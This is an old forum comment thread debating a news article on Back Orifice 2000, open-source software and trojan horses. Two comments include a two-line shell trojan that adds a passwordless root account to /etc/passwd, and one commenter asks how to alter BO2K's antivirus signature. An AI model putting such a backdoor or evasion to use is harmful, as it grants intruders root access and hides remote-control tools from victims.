There was only one other thing that I disagreed with. It said something about when virus writers switched to open source in 1996 (like it was some sort of heavenly revelation) that there was proliferation in macro viruses. This may be true. But its more likely due to the rise of people who are using IE and Outlook for their net browsing and email reading.

Oh well, if nothing else the cDc by releasing the source code will actually FORCE microsoft to patch the whole and release patches that detect the software.

Re:possibly misinterpreted

[dirty]

The argument that if nt were a real OS this wouldn't be possible is pure bull. The same thing is quite possible on *nix. Look at vnc, it's essentially the same thing, it lets you act as if you were sitting right infront of the console in X windows. Or telnetd, it lets you pretend you are right at the console. Simple unix trojan horse program that allows pretty much the same level of controll:

#!/bin/sh

echo foo::0:0::/:/bin/sh >> /etc/passwd

Just get some fool to run this program as root, and boom, you now "0wn" his box. Don't think just because you are using *nix that you are some how safe from this type of attack.

Re:possibly misinterpreted

[Benjamin+Shniper]

I think you hit the nail on the head.

But if the article was about Bo2K,then it would not mention Linux or Apache. Why did the author feel the need to compare these two secure, useful programs with one that was, at best, created to take advantage of computer system's vulnerabilities? Perhaps, pervertedly, the author is claiming that Back Orifice, just like its open source brothers, is a treat to Microsoft. If linux must share the spotlight with hacking of this caliber, then linux should lead the charge to eliminate this bad omen.

Microsoft has been in the habit of claiming that the next version (windows 2000) will cure all ills. As any computer scientist knows, all OS systems need to make trade-offs though. They have, for example, traded security and openness for quick financial gain. Back Orifice is the least productive way to cause Microsoft harm, as it does nothing but make Microsoft look like a helpless victim against sneak attacks. It won't take all two of the reporters brain cells firing to compare that to the "attack" from linux.

-Ben

Re:possibly misinterpreted

[~k.lee]

Err, part of the point of KT's essay was that his hack was undetectable even with the source code. Once you rebuild the compiler once with the infected source, it's undetectable and virtually unremovable unless you can get a hold of binaries that are verifiably "pure".

Strictly speaking, of course, you don't have to accept a precompiled compiler. I took a course once with Robert Dewar, a legendary professor at NYU who told us a story about bootstrapping a computer from scratch-- no assembler, no display driver, no disk drive, nothing but a power switch and a BIOS that could accept raw machine-language hex input from the keyboard to execute. First he wrote a display driver, then he wrote a driver for the tape drive, and finally he wrote an assembler, all in machine language. After that things got considerably easier (ha).

The point being, there is always the possibility of bootstrapping yourself up if you really need to. Anyway, I imagine that it's somewhat more difficult to embed a KT-type "trust" virus inside an assembler than a compiler, given that the assembler runs at such a low semantic level. Compilers used to be written in assembly, and they can be so written again.

~k.lee

Re:possibly misinterpreted

[Reziac]

Someone says
However I did glean a few bits of interesting stuff. Mainly that Microsoft is saying that if its a real remote admin tool that it wouldn't hide from the administrator. Umm, excuse me, I have the displeasure of having an NT server box here at work that I'm pseudo responsible for and NT Server Manager hides.
===========================
In fact, that anything you can think of can be done remotely to anyone's workstation without the user knowing the sysadmin is peering over their shoulder is one of the things M$ is touting as a FEATURE in Win2000.

I do wonder if M$ actually pilfered the whole idea from BO in the first place :)

Re:possibly misinterpreted

[ptevis]

No one seems to mentioning a particulrly interesting bit of history here. When the UNIX system first appeared Kerninghan and Thompson pointed out that they could have encoded a nearly undetectible bug into the C compilter that came with the system. Suppose, they said, that whenever the C compiler recognized that it was compiling the login program (a simple enough pattern match) it would insert code that allowed Ken Thompson to login without a password. Further, whenever it complied a C compiler, it would embed code to duplicate this "functionality" in the new compiler (again, not horribly difficult). They showed that since at some point you have to accept a precompiled compiler, this bug is practically undectible. Second, they pointed out that any time you accept a precompiled binary, you are exposing yourself to this kind of security risk.

That, I think, is one of the strongest practical reasons in favor of the open source model. The ability to actually see what a program is doing to the machine you are running it on is a major advantage. A 50,000 line file may not be easy to read, but source code is definitely much easier that a million lines of 1's and 0's.

pridkett is right though. This isn't really an article about open source, its about BO2K. Yet another example of the media trying to generate interest in a topic many don't understand by throwing vaguely connected buzzwords at it.

Re:possibly misinterpreted

[barleyguy]

Whoever wrote this article had a logic error here. First, there is not any open source OS's that are susceptible to macro viruses, especially Outlook/Word macro viruses. Second, macros are inherently open source, because they are interpreted. But this has absolutely nothing to do with "open source" from the classical definition.

I've got a weird feeling the guy who wrote this article really doesn't know what he's talking about. Just a hunch.

Re:possibly misinterpreted

[Syslevel]

Funny how any time I've tried to do anything as direct and brutal as that to /etc/passwd the shadow password stuff just gets mean and doesn't let the proverbial user 'foo' do much of anything.

FUD.

[jjohn]

This is an old issue. Not totally without merit, but as companies like Red Hat come to depend on OSS code, I sure some amount of QA will be done.

Further, OSS has been around a long while. This sort of thing can happen, but it doesn't last too long.

Sounds like a case of old fashion FUD.

Re:Why Bother?

[dattaway]

Why bother with articles like this? Because issues about security need to be discussed. Its bringing valuable topics that can educate more people about why security is too underrated and how to make it top priority. We need to share more horror stories that are often hidden in fear and shame so people will start to value what a good system can do to protect their resources. Expect to see articles like this many times in the future.

Trojans open a possibility of tactical attack?

[Blue+Hammer]

If I were in the MS camp, and worried -- as they appear to be getting, I would think about sabatoging packages. If a given group was talented and intent, what would stop them from deliberately sabotoging packages and then claiming to the press/world how vulnerable the Open Source community is?

Gates lost a lot of sleep when he thought Netscape was a challenger. He and MS as a whole have been shown to pull some VERY dirty stunts to protect their market share. I'm not saying that they do this, or even that MS specifically would, but what's stopping people from doing it?

I don't pretend to know a lot about the security of the packages and the sources they are mirrored, so this is not a rhetorical question.

Serious mis-interpretation going one here

[Bruce+Perens]

The article does not say that Open Source has more security problems.

The article says that because Back Orifice is open source, there will be more variants of Back Ofifice, and that this will be more of a problem for virus detection vendors.

However, the security problem exploited by Back Orifice is Microsoft's fault. The release of Back Orifice is an attempt to force Microsoft to deal with its security problems.

Folks, if you are running software that has wide-open security problems, like Back Office, and the vendor won't help you except to give you sorry band-aids like virus detection software, it's time for you to lean on that vendor. There is no reason for Microsoft to continue to leave the barn door open - they are every bit as guilty as the computer criminals who exploit that, and in a just world MS executives would be charged, tried, and jailed for the computer crime they have facilitated.

Thanks

Bruce Perens

Re:Open-source Trojan Horses

[Peter+La+Casse]

"The problem with BO2K being 'open-source' is that crackers will NOT publish their modifications to the code."

What do you mean, they won't publish their modifications? They have to, according to the license, or else they're breaking the law!

:)

Dogs and cats.. living together.. MASS HYSTERIA!

[Z0z]

BO2K (or BO for that matter) do not exploit anything. Ever hear of "Remotely Possible","PC Anywhere", or any one of the numerous other remote control products? The only security flaw it seems to be exploiting is the ease of hiding a process from the user. This isn't to say that BO isn't a security risk, because it most definitely is. Maybe that is mainly due to the mindset of most Microsoft product users, but other users of other systems are not immune.

Basically BO enables a single-user system to act with some of the functionality of a multi-user system. Something, Windows 9x definitely doesn't have the security for. Windows NT has some protection in this realm, but still, not enough for a multi-user system. They were never designed to be multi-user systems. But then again, a root kit will enable the same functions on a linux box as this does on a Windows box, it just may be a bit more of a challenge to get the thing installed.

One interesting flaw (well, IMHO it's a flaw) that this could potentially exploit with the right plug-in, is a feature of the MS Crypto-API that will release any certificates installed in the system. If someone teaches the BO doggy a new trick to extract certificates (which as a process of the user, it has the right to do, WITHOUT authentication) there could potentially be a big problem with digital signatures, which are now becoming accepted as substitutes for "wet" signatures (think: paper and pen).

Oh.. think of the possibilities..


P.S. - I am a spelling and grammer genius. Any errors you think you see in this document are probably just transmition errors, and most likely your fault.

Re:That is the point!

[Chris+Hiner]

It's also possible to modify the executable directly, without having the source. The people that crack copy protection do this all the time... Having the source at least lets you build your own known good version...

Re:Did you people read the article?

[Scola]

Yeah, I guess the conclusion one can draw is you can develop better, more diverse, and stronger products with an open source model than a closed one. This general rule applies for products from the dark side as well as from the good guys.

Another major reference to OSS security

[MrSpock]

Tux made the cover of Internet Security Magazine (or something like that; doesn't seem to be online -- I saw it on the newsstand). The article did a really good job of dispelling the "susceptibility to trojans" claim, as well as many other common corporate objections to deploying OSS (such as "if something goes wrong, who do I sue").

The mag may be worth picking up just for the two (a dozen or so pages total) Linux security articles in it.

Re:Clarification (Was Re:What they really mean...)

[Juggler]

It is possible to deal with this sort of thing, although neither Linux, NT or any other OS I'm familiar with (which I'll admit aren't very many) implement it.

Check out LOMAC, it's a system that marks connections (and possibly files as well, I forget) as "untrustworthy" if they come from an untrustworthy medium, such as the internet. Untrusted processes can't mess with trusted stuff, no matter whether they are running as root or nobody...

I like the idea alot, for a normal workstation.

BO2K distribution at DefCon

[unitron]

When CDC tossed BO2K CDs into the crowd...
"ISS immediately passed along copies to watchdog groups such as the Computer Emergency Response Team (CERT) and ICSA as well as Microsoft."
Shouldn't MS have had to pay several hundred dollars for a binary only copy that came with a "no looking at or reverse engineering and if it screws up your system we ain't responsible, and by breaking open the shrink wrap you agree to all this" license agreement?

OSS & Macros - quite the opposite actually

[Booker]

When virus writers moved to an open source model in 1996, there was an explosion in macro viruses, ICSA's Thompson said.

Isn't it actually the other way around? I thought that macros were by definition open source (i.e. not compiled) so variants were easily proliferated. This is different from saying that once "virus hackers" decided to open their souce, people suddenly had new tools to create macro viruses.

p.s. damn, I was gonna use that sig! :)

Anti virus software

[ocie]

If viruses are developed faster because their makers moved to an "open source" model, then this would seem to provide an argument that anti-viral software should also have an open source model.

But for the most part, anti virus software is just a bandaid to cover for something that the OS should be doing in the first place. Frankly, I think OSS and Free software developers have better things to do with their time. Secure delete and undelete in Linux might be nice.

Errata and other points

[Barbarian]

1) "Internet Security Systems researchers have already decoded BO2K protocols and encryption algorithms". So they know how to read source code? Amazing!

2) "Unlike a predecessor released last year that attacked Windows 95/98 systems, BO2K is designed to evade detection". Enough said. How about getting Editors with brains?

3) "On one hand, IT managers can examine code to see how BO2K operates...". And they can also examine it and see EXACTLY what it does, and then install it in place of Microsoft's remote admin. tools. With Microsoft's and other closed-source third party tools, it's anyone's guess.

4) "Users advised not to open e-mail attachments from unknown sources or accept files from Internet chat systems." How about not opening executables from ANYONE. This point is obviously poorly thought out, as the zip_explorer.exe trojan ALWAYS came from a KNOWN source. Even better, what if email programs didn't automatically run .exe's when you double click them in windows?

Oh, these "security experts" ARE pundits

[Pac]

See, the business logic behind antivirus software production dictates that these companies executives be always spreading panic among the innocent userbase. Otherwise, who'd bother to upgrade/buy their products?

There is also a fine similaritie between Microsoft/Intel relationship (upgrade existing bloatware/upgrade processor/upgrade bloatware/...) and Microsoft/Antivirus makers relationship (upgrade bloatware/discover new hole/exploit new hole - this step the kids will do for free/upgrade antivirus/...)

The article is Right On the Mark!

[PD]

I've already seen a trojan hiding in a program. I was looking at this whizbang spreadsheet and it had an entire FLIGHT SIMULATOR built into it. Can you imagine that some hacker who had access to the source code can slip something like that into the code? Good thing it was harmless and didn't format my hard drive.

Yup, that open source is DANGEROUS.....er, wait a sec....me very sorry....the spreadsheet was Microsoft Excel....nevermind.

FUD, Microsoft's Influence, and What am I going to

[OnyxRaven]

A few things to talk about - I hope someone reads this... who knows.

1: FUD:
This is pretty self explanatory, it's filled with FUD. Fear of "oh no, the 'hackers' are going to get me.", Uncertainty of what it is, what it can do, Doubt of it NOT causing a big problem like is promoted in the article. BO was pretty contained, considering. The article was also a huge stab at OSS, which is totally unwarrented. I sure hope someone posts a article on a big news outlet that revives OSS (that is if anyone takes this article seriously, which I'm sure many will).

2: Microsoft's Influence in the Media:
If you look around the magazine racks - you'll see Windows *, PC *, and even some Computer * and Internet * magazine titles. Know who they all tend to cater to? No, not PC's in general. Windows (Namely 9x), and microsoft microsoft microsoft. Wonder why they didn't bring up the fact that cDc has asked why SMS isn't under the same scrutiny? why didn't they explain what 'insidious mode' was? FUD, Bad sources, or better yet, no sources. Many other news organizations have talked to various cDc members (they're pretty responsive to emails, I know) so why didn't they? I'm waiting for my subscription to PCWorld to expire - it blows frankly. It didn't give the Orb drive a second thought, neither with Netscape, neither with the K7. (forgot to say the bit about intel and the media - but enough)

3: What am I Going to Do? (silly short topic):
I've played around with BO2k already. Great tool for remote admin - in a market where other packages cost an arm and a leg. If the AV companies all delete the hell out of BO2k, I'm not going to be able to use it, because I'm thinking I will rely on both. (the upcoming plugins for bo2k will help in software distribution GREATLY.) what should I do? I don't know enough C/++ whatever to modify what the signature would be - maybe some tips?

Re:The real Trojan Horse

[smileyy]

I always thought this proverb worked better "Beware of gifts bearing Greeks".

Root access

[Natedog]

#!/bin/sh

echo foo::0:0::/:/bin/sh >> /etc/passwd

If you can get root to run this then the you need to find another SA. Once *NIX is installed very little needs to be done as root. If you need to install a program as root you better know where it came from and if it can be trusted. I doubt you could even find a case were someone has broken into a system by getting the SA to overwrite /etc/passwd. Most other programs can be installed by the user into that users home directory so no real security issues can arise. On NT, I just gave up and gave myself admin (and so does everyone I know) because I was logging in as administrator and switching back to my user account so offten. The MS "security" model just plain sucks. I would like to see someone set up NT with read only file access to the entire system except for the users home directory - I just ain't going to happen.

BOO HOO HOO!

[Lumpy]

Wahhhh, Pooor microslotrh crap is getting attacked!

Hmm, why dont we hear about linux or Unix virii?
why can NT be eaten alive by a virii while linux will just fart?

as long as MS keeps writing crap the virii will poliferate...
festering and sick bodies harbor disease and virii
and in the software world it seems to be mimicking the biological world.

Quite the opposite...

[Stiletto]

I'd be more concerned about trojan horses in closed-source, proprietary programs, because for the most part they are not subject to the same amount of peer-review as their open-source counterparts.

Re:Quite the opposite...

[wiggles]

Case in point:

Blizzard Entertainment, during the first week of release for Starcraft for Windows, had the program send a copy of the windows registry (without informing the user) to Blizzard whenever a luser logged on to battle.net to play SC over the internet. I remember a massive stink over that....They claimed that they used the information for "support" purposes. Who knows what they really did? The code was closed source, so you couldn't tell.

But I don't think this is what that article was saying. It looks like it's talking more about open source hacker tools, and how they can be easily modified quickly.

Re:The real Trojan Horse

[dirty]

It was the greeks, hence the phrase "Beware of greeks baring gifts."

Re:The real Trojan Horse

[dirty]

No, the trojans weren't. I don't remember exactly where Troy was located, but it was a long boat ride from Greece.

Re:FUD?

[jerodd]

Actually, the term FUD came about by the CEA of Amdahl when he first started making S/370 clones and IBM used FUD marketing tactics against him (i.e. Amdahl can't build a computer, they only have 25 staff, Amdahl has no support infrastructure, blah blah blah). The CEO of Amdahl thus invented the term FUD (but certainly not the technique, *grin*).

Cheers,
Joshua.

OS virii makes it easier for Norton and VET

[semis]

I'm just wondering what the people at Norton and VET do when they come across a new virus.

My guess would be that they reverse-engineer the virus to some sort of pseudo code to determine just exactly how it is working.

So really, OS virii would be easier to protect against given that the Anti-Virus engineers already have the source to them!

Have you seen the Win98 one?...that's a virus

[CE@UIC]

Micros~1 marketing took over the trojan horsing in Win98. Some stupid stuff about going into the "Time/Time Zone" configuration and clicking and holding on Redmond...blah, blah don't remember the rest. Anyway, instead of a flight sim you get a Micros~1 commercial (sp?)

Re:Have you seen the Win98 one?...that's a virus

[Hooloovoo7]

The worst thing about this nasty little piece of software is that nearly every computer sold is infected with it - and it actually causes the computer to become more expensive!!!!!!!
Our wretched species is so made that those who walk on the well-trodden path always throw stones at those who are showing a new road.

Number Two/Virtucom Syndrome

[sammy+baby]

The thing about setting up a scam like this is that the investment you put into it winds up making the reward for cashing in on the damn thing almost negligible.

Take Number Two, from the Austin Powers movies (but especially the first movie). His chief gripe is that he's invested years and years of his life to build up a corporate empire, and Dr. Evil wants to step in and ruin the whole thing by trying to take over the world. It's ludicrous: these are people already rich beyond the dreams of avarice. Why attempt something so risky?

If a guy creates a company which "builds up its reputation" to the point where it is making fair amount of money, it becomes increasingly unlikely that he'll try to bilk his customers. He has too much going for him, and there's too much risk.

(By the way - I seem to recall a post on Bugtraq several months ago which said that Cisco had been caught putting a back door into their router's OS. Amidst a hail of criticism, they issued a patch. It just ain't worth it.)

F - U - D

[Geek+Boy]

Fud, fud, fud,
Which is good, which is bad?
Fud, fud, fud,
Ask your mom and ask your dad.

Re:Open-source Trojan Horses

[SoftwareJanitor]

crackers will NOT publish their modifications to the code

Some will, and some won't. Where would script kiddies be if some crackers didn't publish scripts and how-tos for them? Crackers will publish their modifications, albiet a lot of them will not do so right away. Most of them seem to publish once they have moved on to a newer technique.

You missed the point.

[Cacophony]

I don't know about you guys but what I got from the article is how crackers are implenting open source in their virus creation which makes viruses such BO2K more dangerous.

Over all, the article compliments open source by giving the opinion that open source viruses are more dangerous than closed source viruses.

-Al-
"There's a bird that nests inside you sleeping underneath your skin. When you open up your wings to speak I wish you'd let me in."

Back doors

[Felinoid]

[When I took a class on running for office they told me to do what I'm about to do]
The question isn't how do back doors get into the code but how to get them OUT!!!

True open source means more people can put back doors into code however back doors are a tradition of closed source software nothing about closed source keeps it from happening.

Open source however has very few back doors compared to closed source becouse it is easyer to locate and remove back doors when you have the source code. In closed source even if you do discover a back door you can not remove it short of not using the infected program anymore.

Also open source means you can remove "features" that create security opennings you could drive a truck through. Lacking this ability you have to set strange or crazy policys such as disguarding any e-mail with file attachments.

The only way to make shure your code has no back doors is make shure none of the code is writen by a programmer.

Slightly inaccurate

[Imperator]

I don't remember the exact details, but I'm sure it was quite different than you described. IIRC, it effected a version of the beta, and only was activated when you pirated it, and only sent the email address and a few other things, not the whole registry (which is huge).

-Imperator

Re:Slightly inaccurate

[bliss]

Was anyone prosecuted? If that happened to me I would just get a real good lawyer and look dumb.

Re:The real Trojan Horse

[Imperator]

"Greece" was just an alliance of city-states in what is now the country of Greece. Troy was in Anatolia (aka Asia Minor, now the country of Turkey), and controlled access to the Dardanelles (Greece -> Aegean Sea -> Dardanelles -> Sea of Marmara -> Bosporus -> Black Sea) and thus to the Danube and Persia and a helluva lot of trade. Historically, the Trojan War was about trade, though the excuses given at the time might not have been. Troy was sacked at the end, and not found again until the late 19th century when some guy decided to follow the path described in the Iliad and started digging and found it.

-Imperator

Dijkstra

[AJWM]

(I allways find Dijkstras 'gotos considered harmfull' hilarious. The man is so narrow minded B-)

You've got to remember that Dijkstra was writing that in an era when most programs were still being written in assembler, COBOL, or FORTRAN IV. Anyone who has had to maintain e.g. a FORTRAN IV program will sympathize with the sentiment.

Then too, Dijkstra was a Burroughs Fellow, and Burroughs was well known for machines whose "assembly language" was a variant of ALGOL.

Before I read this I thought all those backdoor stories in Heinlein books or Gibsons Stuff where just urban Myth

Not at all. Backdoors were (are?) fairly common to allow access to special or privileged functions for maintenance/debugging (or cracking). My favorite was the phrase "Springhead, this is worker", borrowed from a Firesign Theatre sketch.

Re:FUD?

[QuMa]

HELP, I don't know what fud is. Should I know what fud is? Do I really want to know what fud is?

:-)

(FUD stands for fear, uncertainty, doubt).

Re:FUD?

[QuMa]

http://www.opensource.org/halloween/

That is the point!

[bsletten]

Isn't that the basic strength of open source? Sure, if you never look at the code, many things could be hidden, but the threat of having millions of code weenies checking it out probably reduce the threat to a non-issue.

Re:That is the point!

[bliss]

Yeah the only time I actually have had root access at all has been at home on my 486.

Re:That is the point!

[KrAphtd1nN3r]

You don't need open-source to do that. You could even modify the administrator's own code, and it would do the same thing. Besides, unless the sysadmin is very crappy, users should never be allowed to write to code files. If they can do so, they probably gained root rights on the system, and putting a trojan in a program is just one of the many ways you can give yourself future access on such a system!!!

Re:That is the point!

[Stonehand]

Well... I can see one possible aspect -- not so much as related to BO2K, but to open-source programs in general.

In a workplace or other shared environment, it is quite possible that the staff do not do code audits. If someone were to, say, take the source code of a common program and modify it with some undesireable feature, the fact that the source exists means that the replacement could be made without needing to code up an entire fascimile in existence. That is, to replace, say, "xterm" with a trojan does not require writing an entirely new xterm-like program; trojaning Notepad would. Insertion would still require (ideally) root compromise on a *nix, or persuading a user to run a particular binary; but you've saved yourself work by building on an existing program and it's nice, familiar, reassuring interface. *That* wasn't directly mentioned by the article, but seemed to have been implied.

Re:The real Trojan Horse

[kmj9907]

Would that I hadn't posted anyway, this beauty would be moderated up to 5!

Don't even worry about the fact that you can only moderate each post by one point. I'd just give Rob a "gift" of some source code to expand /., and viola, instant unlimited moderation points for all users w/ the name kmj9907. :)

kmj
The only reason I keep my ms-dos partition is so I can mount it like the b*tch it is.

Did you people read the article?

[kmj9907]

It's not saying that a trojan horse will be hidden w/in the code, it's saying that trojan horse programs can cause more trouble if they're open source, due to the fact that variations can be made. It's still a tremendous amount of misguided and misrepresentative FUD though.

kmj
The only reason I keep my ms-dos partition is so I can mount it like the b*tch it is.

Re:Did you people read the article?

[Zigg]

Damn straight I read the article. It's a bunch of FUD, plain and simple. I can't believe anyone would take it seriously. Saying that open-source software can "hide" trojan intentions and then citing an open-source program that clearly has those intentions right up front before you download it is seriously misguided.

Re:there already is!

[bliss]

What could someone have to gain with something of that large scale. How could someone just risk getting legal action taken against them and being thrown in prison. Somehow I can't see Linus as being a criminal.

Re:possibly misinterpreted (virii)

[bliss]

As I mentioned in an earlier post I thought virii were cool as well with all the info that the asm gives. It really is quite nice. Well eventually I found linux and achieved nirvana but that is another day's worth of stories.

Re:What they really mean...

[bliss]

I think equating the use of such things as su to compromise security as totally pointless. Even though look at just HOW secure NT is. Nt only meets the lowest level of the DoD's trusted network certification criteria anyway so it's really not the best thing.

Why Bother?

[tomreagan]

Why do we bother even responding to these articles. Anyone with half a brain can see that their arguments make no sense and that this is just incredibly stupid analysis.

Personally, I think we would all be well served to just leave articles like this alone and not waste our breath on them.

Um.. NO

[Crutcher]

The Real Trojan Horse was left outside TROY, they were at war with some italians.
-Crutcher

[humor] Re:M$ and open source propaganda

[ninoles]

I'm pretty sure MS backs cDc. Isn't just another c00l product that only run on MS system? ;)

Re:[humor] Re:M$ and open source propaganda

[Raving+Lunatic]

...Probably, and much in the same way that Hussein is probably on the CIA's payroll...

Regarding the English language.

[TheDullBlade]

There is no fixed authority for the English language, once a term becomes commonly used it becomes part of the language (for any meaningful definition of those terms).

I bristle at (and object to) words being used in such a way that changes or even reverses the meanings in older writings (a particularly painful example is the use of "literally" to add emphasis to a metaphor, as in "we literally slaughtered the other team"), but there's nothing to be gained by whining over superficial changes like some pathetic grammar teacher who still thinks "whom" is a part of modern English.

"Viruses" sounds awkward to many; "virus" logically belongs in that set of Latin-origin irregular nouns with "octopus" and "locus". The "i" ending is certainly more easily distinguished in speech and saves keystrokes.

This is not to say that I use "virii", or that it is universally preferred, but it is in the running, so don't go "correcting" people.

Missing the point of BO2K

[KevinRemhof]

This article has a very interesting slant. It seems to regard the cDc as a legitimate software company. Just because they say that BO2K is a remote admin tool, doesn't mean that's what it is for.

Open Source is not the problem here. Open Source can help with problems like Trojan horses. The problem is those people who intend to use this software for breaking into NT machines. No NT Admin is going to download this thinking that he's going to administrate his network better with this. There are plenty of other tools out there that can do that.

cDc has developed a potentially malicious tool if used for its' proper intent. No one should see it as anything else.

Re:Missing the point of BO2K

[FunOne]

What ISN'T a potentially malicious tool?? I can't find anything that couldn't be used for evil.

CDC has released a remote admin tool, they're doing everything in their power so it wont be seen as a trojan. It has more features than the remote admin tools from Micros~1 & Norton. [Except this one is free]

Both the remote admin tools from Micros~1 & Norton can do invisible installs and hide themselves from the user.

FunOne

Re:The real Trojan Horse

[methuseleh]

So, the article is saying, essentially:

"Beware of GEEKS bearing gifts"

Sorry ;)

--

Since when do crackers respect the law?

[IntelliTubbie]

>>The problem with BO2K being 'open-source' is that
>>crackers will NOT publish their modifications to
>>the code.

>What do you mean, they won't publish their
>modifications? They have to, according to the
>license, or else they're breaking the law!

1) They're only breaking the law if the license is the GPL or something similar - not all licenses require you to publish your changes

2) So what if they break the law? Aren't they doing that anyway by cracking an NT system? That's like saying a buglar wouldn't break a window to get into a house because that's vandalism!

Re:Since when do crackers respect the law?

[Adam+Knapp]

If they don't, he'll tear them a GNU Back Orifice.

Re:Since when do crackers respect the law?

[mal3]

BO2K is GPL'd. You think RMS will make them call it GNU BO2K? ;-)

Open-source Trojan Horses

[IntelliTubbie]

To start, one thing needs to be clarified: This article has nothing to do with Linux or the open-source community, per se. Peer-reviewed open source programs (e.g. anything with the GPL) undergo great scrutiny by a virtual army of developers to ensure that the software IS secure.

The problem with BO2K being "open-source" is that crackers will NOT publish their modifications to the code. This will allow BO2K to potentially fragment into several mutated versions, each slightly different from the next. This makes it more difficult to detect and guard against all variations of BO2K, since crackers might be able to make small modifications to the software that would allow it to slip by security software undetected.

Amusing...

[Aqualung]

I find it rather interesting that the article chooses to focus on the fact that OSS also improve the speed and facility with which viruses are developed... and yet failing to mention that the same viruses, and all 'mutations' thereof would quickly cease to be effective against an OSS operating system. Just my $0.02

- Dave

"Take what thou hast and give it to the poor."

Re:The real Trojan Horse

[remande]

Or, to look at the other end,

Beware goddesses bearing apples.

Re:The real Trojan Horse

[The+Welcome+Rain]

Should have been: "Beware of gifts bearing Greeks." :)

--

Viruses have always been open source.

[Restil]

First, BO2K isn't a virus.

Secondly, viruses have always been open sourced.
Most of them were coded directly in assembly language to keep them small. While macro viruses
and the such are much more complex than the old
style viruses. Back in the day, viruses were rarely more than about 50-100 bytes in size, yet
they were just as dangerous. There never existed any commented C++ code, and the assembly code could easily be displayed on a page of paper.

-Restil

Dont' see the issue.

[Restil]

The article basically just complains about the motives of cDc and the fact that the open source nature of the program will make it difficult for antivirus software to detect different strains and will allow other "malicious" coders a head start.
However, the article doesn't really discuss anything about dangers to the open source movement itself, and I don't really see these dangers either.

Ok, so somebody writes their own copy of, lets say, telnetd with a built in trojan horse. Well, this has already been done before, just download a rootkit from rootshell.org if you want it. nothing new.

Of course, if this trojan was to make it into an official distribution it would have to get by several pairs of eyes first. Say I found some clever way to insert a trojan horse into the kernel itself. In order for it to make it into the official kernel release, Linus himself would have to approve the code (or some other competant coder would). Since not just ANY code is blindly inserted into the kernel, I seriously doubt this would work.

Most other open source is handled in the same way. There's always someone who reviews changes before it gets into the primary release, and even if that person was sleeping that day, eventually someone would discover it, and the coder would be exposed. I just don't see it as a problem.

-Restil

Re:FUD, Microsoft's Influence, and What am I going

[jfunk]

I've played around with BO2k already. Great tool for remote admin - in a market where other packages cost an arm and a leg. If the
AV companies all delete the hell out of BO2k, I'm not going to be able to use it, because I'm thinking I will rely on both. (the
upcoming plugins for bo2k will help in software distribution GREATLY.) what should I do? I don't know enough C/++ whatever to
modify what the signature would be - maybe some tips?

I'm interested in BO2K for the same reasons as you. I use VNC all the time to fix the bi-daily problem with my brother's 98 machine. I also connect to my machine from work and school to check mail, read documentation, etc.

Frankly, I don't see the security risk. Putting BO2K on my brother's computer is no different than putting VNC or PC-Anywhere on it.

I'll try out BO2K when there is a *NIX client. My favourite VNC feature is the Java client so that I can use it within a browser without having to download stuff.

As for your AV problem, I suggest you find out what your AV software does (or will do) regarding BO2K. I think nothing is appropriate. This is a tool, and anybody who is scared of it is, well, not very computer-literate. According to the site, there is no known way to detect it running on a remote machine. That's a good thing. There's obviously no backdoor, or we'd all know about it now.

Any AV company who discriminates against BO2K needs a stern talking to. Imagine if AV software automatically deleted Linux partitions from your HD. It's a similar situation, discriminating against OSS alternatives to proprietary software. On my computer at school, the previous user turned on the AV features and password protected it (I would have fixed that, but I haven't rebooted it in months, and don't care to). It detects in the boot sector, oh my god, a VIRUS!!! Sorry, only LILO. Imagine the new user who installs Linux only to get this message, thinking it's real.

That can't be good.

ummm, no

[/]

The trojans were the ones who accepted the gift (from the Greeks).

A question?

[Nassah+the+Protoss]

Can PGP help diminish that threat?

I understand there is never any real security whenever you are connected using any kind of software GNU, MS, SUN, SCO.........

PGP signed tarballs, rpms...., by the maintainer or the distro like RedHat, Debian, Suse.....

Re:The real Trojan Horse

[Adam+Knapp]

Just to be picky, the Trojan Horse was left outside of Troy by the Greeks. The horse was a holy animal to the Trojans and so they took the wooden horse as a sign from the Greeks that the war was over. Unfortunatly for the Trojans, Odysseus(Ulysses to the Romans) and his men were hidden inside the statue and when night fell, they opened the city gates and that's what made the Trojans lose the Trojan war.

Am I missing the Linux API call...

[???]

Am I missing the API call that allows me to remotely spawn a thread in _another_process_, in fact a _system_process_, thus evading detection? This is something that is at issue here. It is significantly more difficult under *NIX to hide yourself from someone who knows what he/she is doing. I can see that vnc, telnetd, or sshd is running. Once I see that it is running, I can terminate it, and take measures to ensure that the attack is not repeated.

Wait ... the horse was not left *by* the Trojans!

[timothy]

IIRC, the horse was left by the attacking / beseiging (Spartan?) army. The soldiers exited the horse at night, unlocked the gates, and the attackers sacked Troy. Right?

Not that the basic message / metaphor is lost, of course.

I'm sure someone will correct me if this is wrong;)

timothy

there already is!

[EnderWiggnz]

you see... the open source community is the security verification group. when one of the Xmillion number of linux users says "hey, i can hack this using only 4 lines of code", the open source community springs into action, and says.... oh... ok, here's the patch....

The appearance of a trojan is nil, as everyone could see the backdoor in plain view, and close it, and then flame the heck out of whoever tried to put it in.

Security by Obscurity does not work. Just look at NT... or MacOS-X...

"BO2K can be hidden, therefore is evil..."

[The+Silicon+Sorceror]

Both Microsoft and the fools that published this article base their derogatory comments about BO2K on the fact that it can be hidden from the user. For example, here is a quote from Microsoft:

"Remote control software is not malicious in and of itself; in fact, legitimate remote control software packages are available for use by system administrators. What is different about BO2K is that it is intended to be used for malicious purposes, and includes stealth behavior that has no purpose other than to make it difficult to detect."

For the record, BO2K is a perfectly legitimate remote admin tool. It just happens to be open source. It can be used for malicious purposes just like any other tool.

Microsoft says that BO2K is a "malicious hacker tool" (sic) because it can be concealed. They conveniently overlook the fact that their remote administration tool, SMS (Systems Management Server) can be concealed just as well.

On Monday, July 19, Cult of the Dead Cow Communications publicly challenged Microsoft to recall all copies of SMS and to petition virus scanner makers to include signatures for SMS in their products.

Fud, yes, but there was another point too

[arthurs_sidekick]

One of the worries expressed about "open source" and viruses was that when virus coders use open-source development models, they are able to develop virii faster, to wit:

When virus writers moved to an open source model in 1996, there was an explosion in macro viruses, ICSA's Thompson said. "I could see how [the proliferation of attacks] might happen [as hackers] borrow bits and pieces of code" from BO2K. "We may see more viruses that exploit" BO2K code, he said.

Well, two things to say about this: of course the proliferation of macro viruses had nothing to do with the increasing prevalence of computers running all the MS Office apps -- geez! But second, and more important:

If viruses are developed faster because their makers moved to an "open source" model, then this would seem to provide an argument that anti-viral software should also have an open source model. In fact, the argument assumes that development under the open source model is faster.

I note, finally, that the article focused on the problems faced by people running NT anyhow.

Clarification (Was Re:What they really mean...)

[jmweeks]

